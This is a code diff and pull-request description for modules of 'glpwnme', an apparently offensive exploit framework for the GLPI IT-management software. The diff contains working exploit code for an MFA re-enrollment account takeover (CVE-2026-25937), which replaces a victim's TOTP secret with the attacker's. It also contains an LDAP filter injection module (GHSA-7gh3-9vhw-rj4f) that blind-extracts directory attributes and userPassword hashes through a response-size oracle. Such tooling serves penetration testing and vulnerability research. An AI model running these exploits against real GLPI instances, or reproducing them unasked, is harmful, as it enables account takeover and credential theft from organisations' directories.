-            Log.err(f"Attacker cannot access /MFA/Setup (status={mfa_page.status_code})")
-            Log.log("Session fixation may have failed - attacker and victim may not share session")
+        setup = sess.get(self.glpi_session.r("/MFA/Setup"), allow_redirects=False)
+        if setup.status_code != HTTPStatus.OK:
+            Log.err(f"/MFA/Setup denied (HTTP {setup.status_code}) - patched (11.0.6+ is2FAEnabled guard)")
             return
-
-        atk_token = self._csrf(mfa_page.text)
-        if not atk_token:
-            Log.err("No CSRF token on attacker's /MFA/Setup page")
+        m = re.search(r'name="secret"\s+value="([^"]+)"', setup.text)
+        atk_token = self._csrf(setup.text)
+        idor = re.search(r'name="_idor_token"\s+value="([^"]+)"', setup.text)
+        if not m:
+            Log.err("Could not read the new TOTP secret from /MFA/Setup")
             return
+        secret = m.group(1)
+        Log.msg(f"New attacker TOTP secret issued by /MFA/Setup: [b]{secret}[/b]")
 
-        skip = attacker_sess.post(
-            self.glpi_session.r("/MFA/Verify"),
-            data={"skip_mfa": "1", "_glpi_csrf_token": atk_token},
-            allow_redirects=False,
-            verify=False,
-        )
-        if skip.status_code != HTTPStatus.FOUND or "/front/login.php" not in skip.headers.get("Location", ""):
-            Log.err(f"skip_mfa=1 not accepted (status={skip.status_code})")
+        # /MFA/Verify registers the secret only when Session::validateIDOR() passes, so the
+        # form's _idor_token must be sent alongside the code, secret and CSRF token.
+        verify = sess.post(self.glpi_session.r("/MFA/Verify"),
+                           data={"totp_code": self._totp(secret), "secret": secret,
+                                 "_glpi_csrf_token": atk_token or token,
+                                 "_idor_token": idor.group(1) if idor else ""},
+                           allow_redirects=False)
+        if verify.status_code not in (301, 302):
+            Log.err(f"TOTP re-enrollment not accepted (HTTP {verify.status_code})")
             return
+        sess.get(self.glpi_session.r("/front/login.php"), allow_redirects=True)
 
-        # Follow login finalization
-        attacker_sess.get(
-            self.glpi_session.r("/front/login.php"),
-            allow_redirects=True,
-            verify=False,
-        )
-        new_sid = attacker_sess.cookies.get_dict().get(cookie_name)
-        if not new_sid or new_sid == fixed_sid:
-            Log.err("Session ID not rotated after MFA bypass - login may not have completed")
-            return
-
-        # Verify the obtained session is actually authenticated
-        probe_sess = self.glpi_session.get_fresh_session_copy()
-        probe_sess.cookies.set(cookie_name, new_sid)
-        central = probe_sess.get(
-            self.glpi_session.r("/front/central.php"),
-            allow_redirects=False,
-            verify=False,
-        )
-
+        central = sess.get(self.glpi_session.r("/front/central.php"), allow_redirects=False)
         if central.status_code == HTTPStatus.OK and "/front/logout.php" in central.text:
-            Log.msg(f"[green b]Bypass successful[/green b] - authenticated as [b]{victim_user}[/b]")
-            Log.msg(f"Session: {cookie_name}={new_sid}")
-            self._write_log(f"MFA bypass confirmed for {victim_user} via CVE-2026-25937")
+            Log.msg(f"[green b]2FA bypassed[/green b] - re-enrolled our TOTP and authenticated as [b]{victim_user}[/b]")
+            Log.msg(f"Attacker TOTP secret (now the account's 2FA): [b]{secret}[/b]")
+            self._write_log(f"MFA re-enrollment takeover of {victim_user} via CVE-2026-25937")
         else:
-            Log.err(f"Password changed but session not confirmed (status={central.status_code})")
+            Log.err(f"Re-enrollment submitted but session not confirmed authenticated (HTTP {central.status_code})")

--- a/glpwnme/exploits/implementations/cve_2026_25937.py
+++ b/glpwnme/exploits/implementations/cve_2026_25937.py
@@ -26,7 +26,7 @@ class CVE_2026_25937(GlpiExploit):
     by-design grace behaviour and is byte-identical across 11.0.5/11.0.6; the real fix is
     the is2FAEnabled guard on Setup, which is what check() keys on.
 
-    @author unclej4ck, Albert
+    @author login-securite
     @cvss 6.5
     @name CVE_2026_25937
     """
@@ -96,7 +96,7 @@ class CVE_2026_25937(GlpiExploit):
         setup controller, so /MFA/Setup returns 403 once 2FA is configured.
 
         Differential (verified: glpi user with 2FA enrolled, 11.0.5 vuln vs 11.0.6 patched):
-          login → /MFA/Prompt ; GET /MFA/Setup → 200 (vuln) vs 403 (patched).
+          login -> /MFA/Prompt ; GET /MFA/Setup -> 200 (vuln) vs 403 (patched).
 
         Precondition: the supplied account must already have 2FA enrolled (so it lands on
         /MFA/Prompt). If 2FA is not enrolled (lands on /MFA/Setup during grace), setup
@@ -116,7 +116,7 @@ class CVE_2026_25937(GlpiExploit):
         Log.log("Account has 2FA enrolled (/MFA/Prompt). Probing /MFA/Setup accessibility ...")
         setup = self.get("/MFA/Setup", allow_redirects=False)
         if setup.status_code == HTTPStatus.OK:
-            Log.msg("/MFA/Setup reachable for a 2FA-enrolled account → attacker holding the password "
+            Log.msg("/MFA/Setup reachable for a 2FA-enrolled account -> attacker holding the password "
                     "can re-enroll/replace the victim's 2FA, bypassing it (CVE-2026-25937)")
             return True
         if setup.status_code in (HTTPStatus.FORBIDDEN, HTTPStatus.FOUND):
@@ -161,7 +161,7 @@ class CVE_2026_25937(GlpiExploit):
                                 "noAUTO": "0", "redirect": "", "_glpi_csrf_token": token},
                           allow_redirects=False)
         loc = login.headers.get("Location", "")
-        if login.status_code not in (301, 302) or "/MFA/" not in loc:
+        if login.status_code not in (HTTPStatus.MOVED_PERMANENTLY, HTTPStatus.FOUND) or "/MFA/" not in loc:
             Log.err(f"Login did not enter the MFA flow (loc={loc!r}); check the password and that 2FA is enforced")
             return
         Log.msg("Password accepted; in the MFA pre-auth state")
@@ -186,7 +186,7 @@ class CVE_2026_25937(GlpiExploit):
                                  "_glpi_csrf_token": atk_token or token,
                                  "_idor_token": idor.group(1) if idor else ""},
                            allow_redirects=False)
-        if verify.status_code not in (301, 302):
+        if verify.status_code not in (HTTPStatus.MOVED_PERMANENTLY, HTTPStatus.FOUND):
             Log.err(f"TOTP re-enrollment not accepted (HTTP {verify.status_code})")
             return
         sess.get(self.glpi_session.r("/front/login.php"), allow_redirects=True)

--- a/glpwnme/exploits/implementations/ghsa_7gh3_9vhw_rj4f.py
+++ b/glpwnme/exploits/implementations/ghsa_7gh3_9vhw_rj4f.py
@@ -134,14 +134,14 @@ class GHSA_7GH3_9VHW_RJ4F(GlpiExploit):
         breakout, which matches all users with an empty pin (no enumeration needed)."""
         ldap_id = self._discover_ldap_id()
         if ldap_id is None:
-            Log.log("No LDAP directory configured/reachable on the import page — cannot test")
+            Log.log("No LDAP directory configured/reachable on the import page - cannot test")
             return False
 
         vector = "entity_filter" if self._is_11x() else "criterias"
         if self._is_11x():
             user = self._enum_user(ldap_id)
             if not user:
-                Log.log("Could not enumerate an LDAP user (empty directory?) — cannot calibrate")
+                Log.log("Could not enumerate an LDAP user (empty directory?) - cannot calibrate")
                 return False
             t = self._oracle(user, "objectClass=top", ldap_id)
             f = self._oracle(user, "objectClass=ZZZZZ", ldap_id)
@@ -167,7 +167,7 @@ class GHSA_7GH3_9VHW_RJ4F(GlpiExploit):
                     f"delta {delta} bytes, control {fp_delta}) → blind LDAP attribute/hash "
                     f"extraction (GHSA-7gh3-9vhw-rj4f)")
             return True
-        Log.log(f"No injection oracle ({vector}: delta {delta}, control {fp_delta}) — "
+        Log.log(f"No injection oracle ({vector}: delta {delta}, control {fp_delta}) - "
                 "input escaped (patched) or no LDAP data")
         return False
 
@@ -193,7 +193,7 @@ class GHSA_7GH3_9VHW_RJ4F(GlpiExploit):
             if found is None:
                 break
             val += found
-            Log.msg(f"  {attr}: {val}", end="\r")
+            Log.msg(f"  {attr}: {val}", end="\x1b[K\n")
         print()
         return val
 
@@ -204,6 +204,7 @@ class GHSA_7GH3_9VHW_RJ4F(GlpiExploit):
             lo, hi = 0x00, 0xFF
             while lo < hi:
                 mid = (lo + hi) // 2
+                Log.log(f"Trying: {hex(mid)}", end="\r")
                 if self._oracle(user, f"userPassword:2.5.13.18:={prefix}\\{mid:02x}", ldap_id) > threshold:
                     hi = mid
                 else:
@@ -211,7 +212,7 @@ class GHSA_7GH3_9VHW_RJ4F(GlpiExploit):
             if lo == 0:
                 break
             raw.append(lo - 1)
-            Log.msg(f"  userPassword: {bytes(raw).decode('ascii','replace')}", end="\r")
+            Log.msg(f"  userPassword: {bytes(raw).decode('ascii','replace')}", end="\x1b[K\n")
         print()
         return bytes(raw) if raw else None
 

--- a/glpwnme/exploits/implementations/ghsa_7gh3_9vhw_rj4f.py
+++ b/glpwnme/exploits/implementations/ghsa_7gh3_9vhw_rj4f.py
@@ -1,0 +1,244 @@
+import re
+import sys
+import string
+from http import HTTPStatus
+from ..exploit import GlpiExploit
+from glpwnme.exploits.logger import Log
+
+
+class GHSA_7GH3_9VHW_RJ4F(GlpiExploit):
+    """
+    LDAP filter injection in the user-import search (GLPI >= 0.85, GHSA-7gh3-9vhw-rj4f).
+
+    AuthLDAP::buildLdapFilter() builds the LDAP search filter for /front/ldap.import.php
+    from request input WITHOUT ldap_escape(), unlike the login flow (AuthLDAP.php:3445
+    escapes). Two injection points:
+
+      - criterias  (all versions): the criteria value is concatenated raw:
+          $filter .= '(' . $field . '=' . ($begin?'':'*') . $value . ($end?'':'*') . ')';
+        A value like ")(objectClass=top)(uid=victim" breaks out and injects clauses.
+      - entity_filter (11.0.x): read straight from $_REQUEST and concatenated:
+          "(&" . ($_REQUEST['entity_filter'] ?? '') . " $filter $cond)"
+
+    An authenticated user with the IMPORTEXTAUTHUSERS right (1024) blind-extracts any
+    LDAP attribute, including userPassword hashes, via a response-size oracle and the
+    octetStringOrderingMatch (2.5.13.18) binary comparison. Lowest profile that holds
+    the right is Hotliner (bitmask 1025); also Technician/Supervisor/Admin/Super-Admin.
+
+    The login flow escapes (AuthLDAP.php:3445); only the import-search path is affected.
+    Credit: unclej4ck (Aymane Mazguiti), Albert (Ilyass Dehy). CWE-90.
+
+    @author unclej4ck, Albert
+    @cvss 7.7
+    @name GHSA_7GH3_9VHW_RJ4F
+    """
+    _impacts = "LDAP Injection, Credential Disclosure, Information Disclosure"
+    _privilege = "User"
+    _is_check_opsec_safe = True
+    min_version = "0.85"   # no patched release at time of writing; behavioral oracle gates
+
+    _IMPORT = "/front/ldap.import.php"
+    _ALPHA = string.ascii_lowercase + string.ascii_uppercase + string.digits
+    _SYMBOL = "@._+-#!$%^&:;/~"
+    _PROBE_ATTRS = ["uid", "cn", "sn", "givenName", "displayName", "mail",
+                    "telephoneNumber", "title", "description", "employeeNumber",
+                    "ou", "userPassword"]
+
+    # ------------------------------------------------------------------ #
+    # transport + oracle                                                   #
+    # ------------------------------------------------------------------ #
+
+    def _csrf(self):
+        m = re.search(r'name="_glpi_csrf_token"\s+value="([^"]+)"', self.get(self._IMPORT).text)
+        return m.group(1) if m else ""
+
+    def _is_11x(self):
+        v = self.glpi_session.glpi_infos.glpi_version or ""
+        return v.startswith("11.")
+
+    def _import(self, login_field, entity_filter, ldap_id):
+        r = self.post(self._IMPORT, data={
+            "interface": "simple", "criterias[login_field]": login_field,
+            "entity_filter": entity_filter, "authldaps_id": str(ldap_id),
+            "action": "show", "search": "1", "mode": "0", "_glpi_csrf_token": self._csrf(),
+        }, timeout=30)
+        return r
+
+    def _oracle(self, user, inner_filter, ldap_id):
+        """Return response size for: pin `user`, AND-in `inner_filter`. Uses the
+        entity_filter vector on 11.x, the criterias break-out on 10.x and below."""
+        if self._is_11x():
+            r = self._import(f"^{user}$", f"({inner_filter})", ldap_id)
+        else:
+            # break out of (uid=<value>) and inject the oracle clause, re-pin the user
+            r = self._import(f")({inner_filter})(uid={user}", "", ldap_id)
+        return len(r.content)
+
+    def _discover_ldap_id(self):
+        # The criteria form only renders with action=show (10.0.x needs it; harmless on
+        # 11.x). Without it, ldap.import.php?authldaps_id=N omits criterias[login_field]
+        # and discovery fails closed even when an LDAP directory IS configured.
+        for n in range(1, 21):
+            r = self.get(f"{self._IMPORT}?action=show&authldaps_id={n}", allow_redirects=True)
+            if r.status_code == HTTPStatus.OK and "criterias[login_field]" in r.text:
+                return n
+        return None
+
+    def _enum_user(self, ldap_id):
+        """Pull one real LDAP uid from the import listing (broad search)."""
+        if self._is_11x():
+            r = self._import("^", "(objectClass=top)", ldap_id)
+        else:
+            r = self._import(")(objectClass=top)(uid=*", "", ldap_id)
+        html = r.text
+        for pat in (r'data-id="([^"]+)"', r'name="item\[AuthLDAP\]\[([^\]]+)\]"'):
+            m = re.findall(pat, html)
+            if m:
+                return m[0]
+        return None
+
+    # ------------------------------------------------------------------ #
+    # interface                                                            #
+    # ------------------------------------------------------------------ #
+
+    def infos(self):
+        infos = "[u]Description:[/u]\n"
+        infos += "LDAP filter injection in the GLPI user-import search (GHSA-7gh3-9vhw-rj4f).\n"
+        infos += "[b]AuthLDAP::buildLdapFilter()[/b] concatenates the [i]criterias[/i] value (all\n"
+        infos += "versions) and the [i]entity_filter[/i] param (11.0.x) into the LDAP filter with\n"
+        infos += "no ldap_escape(). A user with the [b]IMPORTEXTAUTHUSERS[/b] right (Hotliner+)\n"
+        infos += "blind-extracts any LDAP attribute, including userPassword hashes.\n"
+
+        infos += "\n[u]Params (run):[/u]\n"
+        infos += " - [i]user (default auto-enumerate)[/i]: LDAP uid to target\n"
+        infos += " - [i]ldap_id (default auto-discover)[/i]: authldaps_id\n"
+
+        infos += "\n[u]Usage:[/u]\n"
+        infos += "[grey66]# Confirm the injection (response-size oracle + fake-user control)[/]\n--check\n\n"
+        infos += "[grey66]# Extract attributes + userPassword hash for a user[/]\n--run -O user=jdoe\n"
+
+        infos += "\nExploit is [green b]Safe[/] (read-only blind oracle)."
+        return infos
+
+    def check(self):
+        """Differential LDAP-injection oracle, requiring a configured LDAP directory with at
+        least one entry. AND-in (objectClass=top) [matches every entry] vs (objectClass=ZZZZZ)
+        [matches nothing]: a large response-size delta means the injected clause reached
+        ldap_search (the listing rendered the matched users). On a build that ldap_escape()s
+        the input the clause becomes a literal value, so the directory matches nothing either
+        way and the delta collapses (patched). A non-injecting benign literal search is the
+        false-positive control: the no-match probe must size like that baseline, proving the
+        delta is the injected clause firing and not generic response jitter.
+
+        11.x uses the entity_filter vector pinned to a real user; <11 uses the criterias
+        breakout, which matches all users with an empty pin (no enumeration needed)."""
+        ldap_id = self._discover_ldap_id()
+        if ldap_id is None:
+            Log.log("No LDAP directory configured/reachable on the import page — cannot test")
+            return False
+
+        vector = "entity_filter" if self._is_11x() else "criterias"
+        if self._is_11x():
+            user = self._enum_user(ldap_id)
+            if not user:
+                Log.log("Could not enumerate an LDAP user (empty directory?) — cannot calibrate")
+                return False
+            t = self._oracle(user, "objectClass=top", ldap_id)
+            f = self._oracle(user, "objectClass=ZZZZZ", ldap_id)
+            # FP control: a non-existent pinned user must NOT produce an oracle delta
+            ft = self._oracle("glpwnme_fp_nope_xyz99", "objectClass=top", ldap_id)
+            ff = self._oracle("glpwnme_fp_nope_xyz99", "objectClass=ZZZZZ", ldap_id)
+            fp_delta = abs(ft - ff)
+            label = f"real user '{user}'"
+        else:
+            # criterias breakout with an empty pin -> (uid=*)(objectClass=X)(uid=*):
+            # objectClass=top matches every entry, objectClass=ZZZZZ matches none.
+            t = self._oracle("", "objectClass=top", ldap_id)
+            f = self._oracle("", "objectClass=ZZZZZ", ldap_id)
+            # FP control: a benign literal search (no breakout) must size like the no-match
+            # probe; if it does not, the response is noisy and the delta is untrustworthy.
+            benign = len(self._import("glpwnme_nomatch_literal_xyz", "", ldap_id).content)
+            fp_delta = abs(f - benign)
+            label = "all-entries breakout"
+
+        delta = t - f
+        if delta > 2000 and fp_delta < 2000:
+            Log.msg(f"LDAP filter injection confirmed via the {vector} vector ({label} oracle "
+                    f"delta {delta} bytes, control {fp_delta}) → blind LDAP attribute/hash "
+                    f"extraction (GHSA-7gh3-9vhw-rj4f)")
+            return True
+        Log.log(f"No injection oracle ({vector}: delta {delta}, control {fp_delta}) — "
+                "input escaped (patched) or no LDAP data")
+        return False
+
+    # ------------------------------------------------------------------ #
+    # extraction (run)                                                     #
+    # ------------------------------------------------------------------ #
+
+    @staticmethod
+    def _esc(val):
+        out = []
+        for c in val:
+            out.append(f"\\{ord(c):02x}" if c in ("\\", "(", ")", "*", "\0") else c)
+        return "".join(out)
+
+    def _extract_attr(self, user, attr, ldap_id, threshold):
+        val = ""
+        for _ in range(200):
+            found = None
+            for c in self._ALPHA + self._SYMBOL:
+                if self._oracle(user, f"{attr}={self._esc(val + c)}*", ldap_id) > threshold:
+                    found = c
+                    break
+            if found is None:
+                break
+            val += found
+            Log.msg(f"  {attr}: {val}", end="\r")
+        print()
+        return val
+
+    def _extract_password(self, user, ldap_id, threshold):
+        raw = []
+        for _ in range(80):
+            prefix = "".join(f"\\{b:02x}" for b in raw)
+            lo, hi = 0x00, 0xFF
+            while lo < hi:
+                mid = (lo + hi) // 2
+                if self._oracle(user, f"userPassword:2.5.13.18:={prefix}\\{mid:02x}", ldap_id) > threshold:
+                    hi = mid
+                else:
+                    lo = mid + 1
+            if lo == 0:
+                break
+            raw.append(lo - 1)
+            Log.msg(f"  userPassword: {bytes(raw).decode('ascii','replace')}", end="\r")
+        print()
+        return bytes(raw) if raw else None
+
+    def run(self, user=None, ldap_id=None):
+        ldap_id = ldap_id or self._discover_ldap_id()
+        if ldap_id is None:
+            Log.err("No LDAP server found on the import page")
+            return
+        user = user or self._enum_user(ldap_id)
+        if not user:
+            Log.err("No LDAP user to target (supply -O user=<uid>)")
+            return
+        t = self._oracle(user, "objectClass=top", ldap_id)
+        f = self._oracle(user, "objectClass=ZZZZZ", ldap_id)
+        if t - f < 2000:
+            Log.err(f"No oracle for '{user}' (escaped/patched or user absent)")
+            return
+        threshold = (t + f) // 2
+        Log.msg(f"Extracting attributes for [b]{user}[/b] (oracle delta {t - f}) ...")
+        for attr in self._PROBE_ATTRS:
+            if attr == "userPassword":
+                continue
+            if self._oracle(user, f"{attr}=*", ldap_id) > threshold:
+                self._extract_attr(user, attr, ldap_id, threshold)
+        if self._oracle(user, "userPassword=*", ldap_id) > threshold:
+            Log.msg("Extracting userPassword via octetStringOrderingMatch ...")
+            raw = self._extract_password(user, ldap_id, threshold)
+            if raw:
+                Log.msg(f"  [green b]userPassword[/]: {raw.decode('ascii','replace')}")
+        self._write_log(f"GHSA-7gh3-9vhw-rj4f LDAP extraction for {user}")

--- a/glpwnme/exploits/implementations/ghsa_7gh3_9vhw_rj4f.py
+++ b/glpwnme/exploits/implementations/ghsa_7gh3_9vhw_rj4f.py
@@ -1,5 +1,4 @@
 import re
-import sys
 import string
 from http import HTTPStatus
 from ..exploit import GlpiExploit
@@ -164,7 +163,7 @@ class GHSA_7GH3_9VHW_RJ4F(GlpiExploit):
         delta = t - f
         if delta > 2000 and fp_delta < 2000:
             Log.msg(f"LDAP filter injection confirmed via the {vector} vector ({label} oracle "
-                    f"delta {delta} bytes, control {fp_delta}) → blind LDAP attribute/hash "
+                    f"delta {delta} bytes, control {fp_delta}) -> blind LDAP attribute/hash "
                     f"extraction (GHSA-7gh3-9vhw-rj4f)")
             return True
         Log.log(f"No injection oracle ({vector}: delta {delta}, control {fp_delta}) - "

--- a/glpwnme/exploits/implementations/ghsa_7gh3_9vhw_rj4f.py
+++ b/glpwnme/exploits/implementations/ghsa_7gh3_9vhw_rj4f.py
@@ -47,10 +47,6 @@ class GHSA_7GH3_9VHW_RJ4F(GlpiExploit):
     # transport + oracle                                                   #
     # ------------------------------------------------------------------ #
 
-    def _csrf(self):
-        m = re.search(r'name="_glpi_csrf_token"\s+value="([^"]+)"', self.get(self._IMPORT).text)
-        return m.group(1) if m else ""
-
     def _is_11x(self):
         v = self.glpi_session.glpi_infos.glpi_version or ""
         return v.startswith("11.")
@@ -59,7 +55,7 @@ class GHSA_7GH3_9VHW_RJ4F(GlpiExploit):
         r = self.post(self._IMPORT, data={
             "interface": "simple", "criterias[login_field]": login_field,
             "entity_filter": entity_filter, "authldaps_id": str(ldap_id),
-            "action": "show", "search": "1", "mode": "0", "_glpi_csrf_token": self._csrf(),
+            "action": "show", "search": "1", "mode": "0",
         }, timeout=30)
         return r
 


### PR DESCRIPTION
Authentication-flow modules split out of #12: LDAP filter injection in the login path, SSO identity swap, MFA accessibility bypass, and the LDAP import-search vector.

Notes:
- Split from #12, one PR per vulnerability class.
- Uses the existing `self.get`/`self.post` helpers (CSRF + URL expansion); a few apirest and edge calls stay direct where the helper would add nothing.
- Exercised against live 10.0.x/11.0.x vulnerable and patched instances.